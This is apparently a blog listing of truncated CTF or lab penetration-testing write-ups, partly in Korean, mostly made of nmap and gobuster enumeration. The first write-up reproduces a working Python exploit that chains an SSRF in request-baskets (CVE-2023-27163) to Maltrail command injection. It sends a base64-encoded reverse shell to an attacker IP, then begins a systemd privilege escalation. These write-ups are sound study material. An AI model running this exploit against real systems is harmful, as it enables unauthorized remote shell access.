Penetration Testing

Enumeration Nmap PORT STATE SERVICE │22/tcp open ssh │55555/tcp open unknown Request Basket 55555번 포트로 http 접속을 해 보니 request-basket이라는 서비스가 나왔습니다. Exploitation CVE-2023-27163 #!/usr/bin/env python3 import requests import sys import random import string import base64 import time def ensure_http_schema(url): if not url.startswith(("http://", "https://")): return "http://" + url return url def generate_basket_name(length=6): return ''.join(random.choices(string.ascii_lowercase, k=length)) def create_proxy_basket(server_url, forward_url): if not server_url.endswith("/"): server_url += "/" basket_name = generate_basket_name() api_url = f"{server_url}api/baskets/{basket_name}" payload = { "forward_url": forward_url, "proxy_response": True, "insecure_tls": False, "expand_path": True, "capacity": 250 } print(f"[+] Creating proxy basket '{basket_name}' pointing to {forward_url}") r = requests.post(api_url, json=payload) if r.status_code not in [200, 201]: print(f"[!] Failed to create basket: {r.status_code} {r.text}") sys.exit(1) token = r.json().get("token") basket_url = f"{server_url}{basket_name}" print(f"[+] Basket created: {basket_url}") print(f"[+] Authorization Token: {token}") return basket_url def send_reverse_shell(proxy_url, attacker_ip, attacker_port): print("[+] Encoding reverse shell payload...") payload = f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{attacker_ip}",{attacker_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("sh")'""" b64_payload = base64.b64encode(payload.encode()).decode() injected_payload = f'`echo {b64_payload} | base64 -d | bash`' print("[+] Sending command injection via proxy to /login...") response = requests.post(f"{proxy_url}/login", data={"username": f";{injected_payload}"}) if response.status_code in [200, 302]: print("[+] Exploit sent successfully! Check your listener.") else: print(f"[!] Exploit may have failed. HTTP {response.status_code}: {response.text}") if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: {sys.argv[0]} <attacker_ip> <attacker_port> <request_baskets_url>") print(f"Example: {sys.argv[0]} 10.10.10.10 8000 http://10.129.229.26:55555") sys.exit(1) attacker_ip = sys.argv[1] attacker_port = int(sys.argv[2]) request_baskets_url = ensure_http_schema(sys.argv[3]) proxy_target_url = "http://127.0.0.1:80" proxy_url = create_proxy_basket(request_baskets_url, proxy_target_url) time.sleep(3) send_reverse_shell(proxy_url, attacker_ip, attacker_port) POC 출처 GitHub - bl4ckarch/ssrf_to_rce_sau: A simple python script that exploits, Service side request forgery on the request-basket 1.2.1 version then Unauith Command injection via Vulnerable parameter SSRF를 통해 80포트 내부 서비스에 페이로드를 전달합니다. 80포트 Maltrail의 RCE 취약점을 통해 리버스 쉘을 획득합니다. Privilege Escalation sudo -l Matching Defaults entries for puma on sau: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User puma may run the following commands on sau: (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service sudo -l 로 루트 권한에서 실행할 수 있는 명령어를 확인해봅니다. /usr/bin/systemctl status를 실행할 수 있었습니다. /usr/bin/systemctl --version systemd 245 (245.4-4ubuntu3.22) systemd의 버전을 확인해보니 245.4였습니다. CVE-2023-26604 💀 Exploit for systemd 246 - Local Privilege Escalation CVE-2023-26604 ...

Enumeration Nmap command sudo nmap -p- target -T4 result Nmap scan report for target (10.129.227.227) Host is up (0.24s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 22, 80 번 포트가 열려있는 것을 확인할 수 있습니다. command sudo nmap -p 22,80 -sC -sV target result Host is up (0.24s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA) | 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA) |_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Is my Website up ? |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ...

Enumeration Nmap command sudo nmap -sC -sV target -T4 result Nmap scan report for 10.129.228.217 Host is up (0.27s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA) |_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519) 80/tcp open http Apache httpd 2.4.52 |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Did not follow redirect to http://searcher.htb/ Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel http 포트와 ssh 포트가 열려있는 것을 확인할 수 있습니다. gobuster command gobuster dir -u http://target -w ~/wordlists/dirb/common.txt result Progress: 0 / 1 (0.00%) 2025/10/10 14:04:20 the server returns a status code that matches the provided options for non existing urls. http://target/4a437574-206b-45c5-80a3-853688eb8182 => 302 (redirect to http://searcher.htb/) (Length: 276). Please exclude the response length or the status code or set the wildcard option.. To continue please exclude the status code or the length searcher.htb로 리다이렉트를 시킵니다. 따라서 /etc/hosts파일을 수정하여 타겟 ip와 해당 url을 맵핑합니다. ...

About this lab Utilize enumeration, web enumeration, and WordPress enumeration techniques to identify vulnerabilities. Engage in database enumeration and implement privilege escalation strategies. Additionally, harness the abuse of sudo permissions to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation. Enumeration Nmap command sudo nmap -p- T4 target result Host is up (0.098s latency). Not shown: 65523 filtered tcp ports (no-response) PORT STATE SERVICE 20/tcp closed ftp-data 21/tcp open ftp 22/tcp open ssh 53/tcp open domain 80/tcp open http 123/tcp closed ntp 137/tcp closed netbios-ns 138/tcp closed netbios-dgm 139/tcp open netbios-ssn 666/tcp open doom 3306/tcp open mysql 12380/tcp open unknown command ...

About this lab Engage in enumeration, web enumeration, and exploiting SQL injection techniques to identify vulnerabilities. Utilize password cracking methods and implement privilege escalation strategies to enhance your access. This lab is designed to capitalize on your skills in vulnerability exploitation. Enumeration Nmap command sudo nmap -p- -T4 target First, we have to scan all of the target ports. result Host is up (0.10s latency). Not shown: 65369 filtered tcp ports (no-response), 163 filtered tcp ports (host-prohibited) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http The ftp, ssh, and http ports are open. command ...